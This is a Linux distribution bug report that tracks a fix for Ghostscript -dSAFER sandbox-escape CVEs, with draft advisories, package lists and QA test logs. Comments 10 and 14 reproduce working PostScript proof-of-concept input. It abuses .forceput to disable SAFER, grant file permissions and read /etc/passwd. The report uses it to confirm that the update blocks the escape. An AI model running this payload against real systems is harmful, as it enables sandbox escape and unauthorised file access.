Bug 23659 - ghostscript new security issue CVE-2018-17961, CVE-2018-18073 and CVE-2018-18284
Summary: ghostscript new security issue CVE-2018-17961, CVE-2018-18073 and CVE-2018-18284
Status: RESOLVED FIXED
Alias: None
Product: Mageia
Classification: Unclassified
Component: Security (show other bugs)
Version: 6
Hardware: All Linux
Priority: Normal normal
Target Milestone: ---
Assignee: QA Team
QA Contact: Sec team
URL:
Whiteboard: MGA6-64-OK
Keywords: advisory, validated_update
Depends on:
Blocks:
 
Reported: 2018-10-09 21:58 CEST by David Walser
Modified: 2018-10-19 20:37 CEST (History)
7 users (show)

See Also:
Source RPM: ghostscript-9.24-8.mga7.src.rpm
CVE: CVE-2018-17961, CVE-2018-18073, CVE-2018-18284
Status comment:


Attachments

Description David Walser 2018-10-09 21:58:03 CEST
A security issue fixed upstream in Ghostscript has been announced:
https://www.openwall.com/lists/oss-security/2018/10/09/4

The commits that fixed the issue are linked from the message above.

Mageia 6 is also affected.
David Walser 2018-10-09 21:58:12 CEST

Whiteboard: (none) => MGA6TOO

Comment 1 David Walser 2018-10-10 00:36:18 CEST
Bug 23526, our previous update, didn't mention:
CVE-2018-11645
CVE-2018-16585
CVE-2018-17183

Ubuntu has issued advisories for those on September 19 and October 1:
https://usn.ubuntu.com/3768-1/
https://usn.ubuntu.com/3773-1/
Comment 2 Marja Van Waes 2018-10-10 06:10:46 CEST
Assigning to all packagers collectively, since there is no registered maintainer for this package.
Also CC'ing two committers.

CC: (none) => marja11, nicolas.salguero, smelror
Assignee: bugsquad => pkg-bugs

Comment 3 Nicolas Salguero 2018-10-10 15:12:08 CEST
Suggested advisory:
========================

The updated packages fix many bugs and a security vulnerability:

Bypassing executeonly to escape -dSAFER sandbox. (CVE-2018-17961)

References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17961
https://www.openwall.com/lists/oss-security/2018/10/09/4
========================

Updated packages in core/updates_testing:
========================
ghostscript-9.25-1.mga6
ghostscript-dvipdf-9.25-1.mga6
ghostscript-common-9.25-1.mga6
ghostscript-X-9.25-1.mga6
ghostscript-module-X-9.25-1.mga6
lib(64)gs9-9.25-1.mga6
lib(64)gs-devel-9.25-1.mga6
lib(64)ijs1-0.35-140.mga6
lib(64)ijs-devel-0.35-140.mga6
ghostscript-doc-9.25-1.mga6

from SRPMS:
ghostscript-9.25-1.mga6.src.rpm

Status: NEW => ASSIGNED
Version: Cauldron => 6
Whiteboard: MGA6TOO => (none)

Nicolas Salguero 2018-10-10 15:12:40 CEST

Assignee: pkg-bugs => qa-bugs

Comment 4 David Walser 2018-10-10 16:19:13 CEST
What about Comment 1?

Keywords: (none) => feedback

Comment 5 Nicolas Salguero 2018-10-10 16:40:57 CEST
(In reply to David Walser from comment #4)
> What about Comment 1?

According to MITRE:
- CVE-2018-11645: Ghostscript before 9.21rc1
- CVE-2018-16585: Ghostscript before 9.24
- CVE-2018-17183: Ghostscript before 9.25 but the commit linked to that CVE was already in our ghostscript-9.24 package.
Comment 6 David Walser 2018-10-10 17:40:05 CEST
Thanks!

Keywords: feedback => (none)

Comment 7 David Walser 2018-10-11 23:02:01 CEST
One more commit is necessary:
https://www.openwall.com/lists/oss-security/2018/10/11/3

Keywords: (none) => feedback

Comment 8 David Walser 2018-10-11 23:05:57 CEST
And yet another needed commit with a new CVE:
https://www.openwall.com/lists/oss-security/2018/10/10/12

Summary: ghostscript new security issue CVE-2018-17961 => ghostscript new security issue CVE-2018-17961 and CVE-2018-18073

Comment 9 Nicolas Salguero 2018-10-12 09:49:54 CEST
Suggested advisory:
========================

The updated packages fix many bugs and security vulnerabilities:

Bypassing executeonly to escape -dSAFER sandbox. (CVE-2018-17961)

Saved execution stacks can leak operator arrays. (CVE-2018-18073)

References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17961
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18073
https://www.openwall.com/lists/oss-security/2018/10/09/4
https://www.openwall.com/lists/oss-security/2018/10/11/3
https://www.openwall.com/lists/oss-security/2018/10/10/12
========================

Updated packages in core/updates_testing:
========================
ghostscript-9.25-1.1.mga6
ghostscript-dvipdf-9.25-1.1.mga6
ghostscript-common-9.25-1.1.mga6
ghostscript-X-9.25-1.1.mga6
ghostscript-module-X-9.25-1.1.mga6
lib(64)gs9-9.25-1.1.mga6
lib(64)gs-devel-9.25-1.1.mga6
lib(64)ijs1-0.35-140.1.mga6
lib(64)ijs-devel-0.35-140.1.mga6
ghostscript-doc-9.25-1.1.mga6

from SRPMS:
ghostscript-9.25-1.1.mga6.src.rpm
Nicolas Salguero 2018-10-12 09:50:51 CEST

Keywords: feedback => (none)

Comment 10 Len Lawrence 2018-10-12 13:02:15 CEST
Mageia 6, x86_64
Topped up the pre-update packages.

Before update:

CVE-2018-17961
https://www.openwall.com/lists/oss-security/2018/10/10/12
$ gs -dSAFER -sDEVICE=ppmraw
GS>{ null .setglobal } stopped clear
GS>$error /estack get ==
[--%interp_exit-- .runexec2 -file- {--dup-- null --ne-- {--exec-- true} {--pop-- false} --ifelse--} null 2 --%stopped_push-- -file- {prompt {(%statementedit)
[...]
null 2 --%stopped_push-- -file- false 1 --%stopped_push-- 1916 1 3 --%oparray_pop-- {-dict- /FontDirectory --.currentglobal-- {-dict-} {/LocalFontDirectory --.systemvar--} --ifelse-- --.forceput-- --pop--}]
GS>quit

Quoting the reference above:
"Once you have a reference to forceput, you can do anything you like, see
the exploit for CVE-2018-18073 as an example of abusing forceput to get
arbitrary filesystem access."
I could not find that exploit but updating solved the problem.

Waiting for the mirrors to sync.  Tested the earlier update.  When the new files appear I will run through the same tests again and report any differences in behaviour.    
After the first update you can access the error stack safely:
$ gs -dSAFER -sDEVICE=ppmraw
GPL Ghostscript 9.25 (2018-09-13)
Copyright (C) 2018 Artifex Software, Inc.  All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
GS>{ null .setglobal } stopped clear
GS>$error /estack get ==
[--%interp_exit-- .runexec2 -file- --.setglobal-- null 2 --%stopped_push-- -file- --.setglobal-- --%loop_continue-- --.setglobal-- --.setglobal-- false 1 --%stopped_push-- .runexec2 -file- --.setglobal-- null 2 --%stopped_push-- -file- false 1 --%stopped_push-- 1920 1 3 --%oparray_pop-- --.setglobal--]
GS>

Ran a few simple tests of gs.
Displayed a postscript file.
$ gs abc-0.ps
GPL Ghostscript 9.25 (2018-09-13)
Copyright (C) 2018 Artifex Software, Inc.  All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
Querying operating system for font files...
Can't find (or can't open) font file /usr/share/ghostscript/9.25/Resource/Font/BorzoiRegular.
Can't find (or can't open) font file BorzoiRegular.
Loading BorzoiRegular font from /home/lcl/.local/share/fonts/BorzoiRegular.pfb... 4495204 2874741 3183244 1851046 3 done.
>>showpage, press <return> to continue<<

GS>quit

LibreOffice has ghostscript support.
The same file displayed OK with that.
Browsed an e-book pdf file with gs, hitting return to turn the pages.  On quit it insisted on flicking through the rest of the 832 pages.

Converted a dvi file to a pdf.
$ dvipdf refcard.dvi refcard.pdf
dvips: Font cmbx10 at 13824 not found; scaling 600 instead.
dvips: Such scaling will generate extremely poor output.
Page 1 may be too complex to print
Page 2 may be too complex to print
Page 5 may be too complex to print
Page 6 may be too complex to print
Warning:  no %%Page comments generated.

In fact it reproduced perfectly in okular - no loss of quality.

Looks OK for 64-bits.

CC: (none) => tarazed25

Comment 11 Len Lawrence 2018-10-13 11:24:52 CEST
CVE-2018-18073 has reserved status; no details of possible exploits available.

Passing it on.

Whiteboard: (none) => MGA6-64-OK

Comment 12 David Walser 2018-10-17 00:54:12 CEST
Ugh, another commit is needed for CVE-2018-18284:
https://www.openwall.com/lists/oss-security/2018/10/16/2

Can we add it in?
Comment 13 Nicolas Salguero 2018-10-17 09:39:28 CEST
Suggested advisory:
========================

The updated packages fix many bugs and security vulnerabilities:

Bypassing executeonly to escape -dSAFER sandbox. (CVE-2018-17961)

Saved execution stacks can leak operator arrays. (CVE-2018-18073)

1Policy operator gives access to .forceput. (CVE-2018-18284)

References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17961
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18073
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18284
https://www.openwall.com/lists/oss-security/2018/10/09/4
https://www.openwall.com/lists/oss-security/2018/10/11/3
https://www.openwall.com/lists/oss-security/2018/10/10/12
https://www.openwall.com/lists/oss-security/2018/10/16/2
========================

Updated packages in core/updates_testing:
========================
ghostscript-9.25-1.2.mga6
ghostscript-dvipdf-9.25-1.2.mga6
ghostscript-common-9.25-1.2.mga6
ghostscript-X-9.25-1.2.mga6
ghostscript-module-X-9.25-1.2.mga6
lib(64)gs9-9.25-1.2.mga6
lib(64)gs-devel-9.25-1.2.mga6
lib(64)ijs1-0.35-140.2.mga6
lib(64)ijs-devel-0.35-140.2.mga6
ghostscript-doc-9.25-1.2.mga6

from SRPMS:
ghostscript-9.25-1.2.mga6.src.rpm
Nicolas Salguero 2018-10-17 09:40:03 CEST

CVE: (none) => CVE-2018-17961, CVE-2018-18073, CVE-2018-18284
Summary: ghostscript new security issue CVE-2018-17961 and CVE-2018-18073 => ghostscript new security issue CVE-2018-17961, CVE-2018-18073 and CVE-2018-18284

Nicolas Salguero 2018-10-17 09:41:01 CEST

Whiteboard: MGA6-64-OK => (none)

Comment 14 Len Lawrence 2018-10-17 10:04:32 CEST
ghostscript-9.25-1.1.mga6

CVE-2018-18284

Tried out the commands given at https://www.openwall.com/lists/oss-security/2018/10/16/2

$ gs -dSAFER -sDEVICE=ppmraw
GPL Ghostscript 9.25 (2018-09-13)
Copyright (C) 2018 Artifex Software, Inc.  All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
GS>/.forceput { <<>> <<>> 4 index (ignored) 5 index 5 index .policyprocs 1
get exec pop pop pop pop pop pop pop } def
GS>systemdict /SAFER false .forceput
GS>systemdict /userparams get /PermitFileControl [(*)] .forceput
GS>systemdict /userparams get /PermitFileWriting [(*)] .forceput
GS>systemdict /userparams get /PermitFileReading [(*)] .forceput
GS>(/etc/passwd) (r) file 1024 string readline pop ==
(root:x:0:0:root:/root:/bin/bash)(root:x:0:0:root:/root:/bin/bash)
GS>quit

The new version is not on the mirrors yet.  Later.
Comment 15 Len Lawrence 2018-10-17 18:41:36 CEST
Updated the packages.
$ rpm -qa | grep ghostscript
ghostscript-9.25-1.2.mga6
ghostscript-module-X-9.25-1.2.mga6
ghostscript-dvipdf-9.25-1.2.mga6
ghostscript-common-9.25-1.2.mga6
ghostscript-X-9.25-1.2.mga6

$ gs -dSAFER -sDEVICE=ppmraw
GPL Ghostscript 9.25 (2018-09-13)
Copyright (C) 2018 Artifex Software, Inc.  All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
GS>/.forceput { <<>> <<>> 4 index (ignored) 5 index 5 index .policyprocs 1
get exec pop pop pop pop pop pop pop } def
GS>systemdict /SAFER false .forceput
Error: /undefined in .policyprocs
Operand stack:
   --dict:963/1684(ro)(G)--   SAFER   false   --dict:0/0(L)--   --dict:0/0(L)--   --dict:963/1684(ro)(G)--   (ignored)   SAFER   false
Execution stack:
   %interp_exit   .runexec2   --nostringval--   --nostringval--   --nostringval--   2   %stopped_push   --nostringval--   --nostringval--   %loop_continue   --nostringval--   --nostringval--   false   1   %stopped_push   .runexec2   --nostringval--   --nostringval--   --nostringval--   2   %stopped_push   --nostringval--   --nostringval--
Dictionary stack:
   --dict:963/1684(ro)(G)--   --dict:0/20(G)--   --dict:79/200(L)--
Current allocation mode is local
Last OS error: No such file or directory
Current file position is 34

Any further attempts to use systemdict are thwarted in the same way.
Good result.

Ran simple tests again.  Printed a postscript file.  It looks fine.

Whiteboard: (none) => MGA6-64-OK

Comment 16 Thomas Andrews 2018-10-17 22:45:26 CEST
Looks good to me, after Len's tests. Validating. Correct (I think) advisory suggestion in Comment 13.

Keywords: (none) => validated_update
CC: (none) => andrewsfarm, sysadmin-bugs

Thomas Backlund 2018-10-19 18:45:23 CEST

Keywords: (none) => advisory
CC: (none) => tmb

Comment 17 Mageia Robot 2018-10-19 20:37:31 CEST
An update for this issue has been pushed to the Mageia Updates repository.

https://advisories.mageia.org/MGASA-2018-0408.html

Resolution: (none) => FIXED
Status: ASSIGNED => RESOLVED


Note You need to log in before you can comment on or make changes to this bug.